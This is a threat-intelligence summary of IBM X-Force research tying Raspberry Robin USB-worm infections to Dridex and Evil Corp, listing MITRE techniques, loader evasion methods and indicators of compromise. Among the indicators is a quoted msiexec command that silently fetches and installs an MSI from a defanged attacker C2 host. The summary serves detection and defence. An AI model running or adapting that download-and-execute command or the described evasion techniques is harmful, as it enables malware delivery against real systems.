IBM X-Force/MDR analysis connects Raspberry Robin infections with the Dridex malware and the Russia-based Evil Corp, revealing shared loader structures, anti-analysis techniques, and a workflow that leverages USB-based initial access. The report traces the infection chain from a malicious LNK on USB through msiexec to download and execute an MSI, then loads Raspberry Robin payloads that resemble Dridex, suggesting Evil Corp’s use of Raspberry Robin infrastructure for its attacks. #RaspberryRobin #Dridex #EvilCorp #FAKEUPDATES #SocGholish #QNAP
Keypoints
- IBM X-Force/MDR links Raspberry Robin infections to Evil Corp by comparing Raspberry Robin loaders with Dridex loaders, noting very similar structure and functionality.
- Initial access is typically via USB with a malicious .LNK file that uses msiexec to download and execute an MSI from a C2 domain.
- The malware uses living-off-the-land binaries (LOLBins) such as rundll32.exe, fodhelper.exe, regsvr32.exe, dllhost.exe, and odbcconf.exe to load and run the payload.
- Two Raspberry Robin loader variants show complex decryption, anti-analysis, and hook-detection techniques to evade security software.
- X-Force’s comparative analysis finds strong similarities between Raspberry Robin loaders and Dridex loaders, including string decoding and payload decoding approaches.
- Recommendations emphasize security awareness, IOC searches, EDR deployment, USB device controls, and disabling AutoRun to mitigate Raspberry Robin.
MITRE Techniques
- [T1091] Replication Through Removable Media – Raspberry Robin is delivered by a USB device containing a malicious .LNK file, leading to execution. Bracketed quote: “…delivered by a USB device, which contains a malicious Microsoft shortcut (.LNK) file.”
- [T1105] Ingress Tool Transfer – The MS installer is downloaded and executed from a C2 domain. Bracketed quote: “to download and execute an MSI installer from a command and control (C2) domain.”
- [T1218] Signed Binary Proxy Execution – Msiexec is used to download/execute and LOLBins are used to load payload. Bracketed quote: “spawns a malicious command referencing msiexec.exe, a legitimate Windows system utility” and “utilizes other legitimate Windows system utilities and tools, known as living-off-the-land binaries (LOLBin) such as rundll32.exe, fodhelper.exe, regsvr32.exe, dllhost.exe, and odbcconf.exe…”
- [T1027] Obfuscated/Compressed Files and Information – The loaders decode strings at runtime and operate with highly obfuscated payloads. Bracketed quote: “decodes strings at runtime and then decodes a highly obfuscated DLL whose purpose has not been determined.”
- [T1055] Process Injection – The final payload is copied into the process space of the original loader and executed. Bracketed quote: “The intermediate loader copies the final payload to the process space of the original loader, Raspberry Robin Loader variant 2 and then executes it.”
- [T1562] Impair Defenses – Anti-analysis techniques in the loaders detect security software via hook-detection in LdrLoadDll and other checks. Bracketed quote: “antianalysis technique… detects hooks in the function LdrLoadDll()”
Indicators of Compromise
- [File hashes] context – Raspberry Robin Loader Variant 1: c0a13af59e578b77e82fe0bc87301f93fc2ccf0adce450087121cb32f218092c
- [File hashes] context – Dridex Loader: b30b76585ea225bdf8b4c6eedf4e6e99aff0cf8aac7cdf6fb1fa58b8bde68ab3
- [File hashes] context – Raspberry Robin Loader Variant 2: 1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1
- [Command line] context – msieXeC /q /I “S8 [.]Cx:8080/random string/coMpUTErname=USER”
- [Port] context – 8080 – non-standard HTTP port used in the payload delivery
Read more: https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/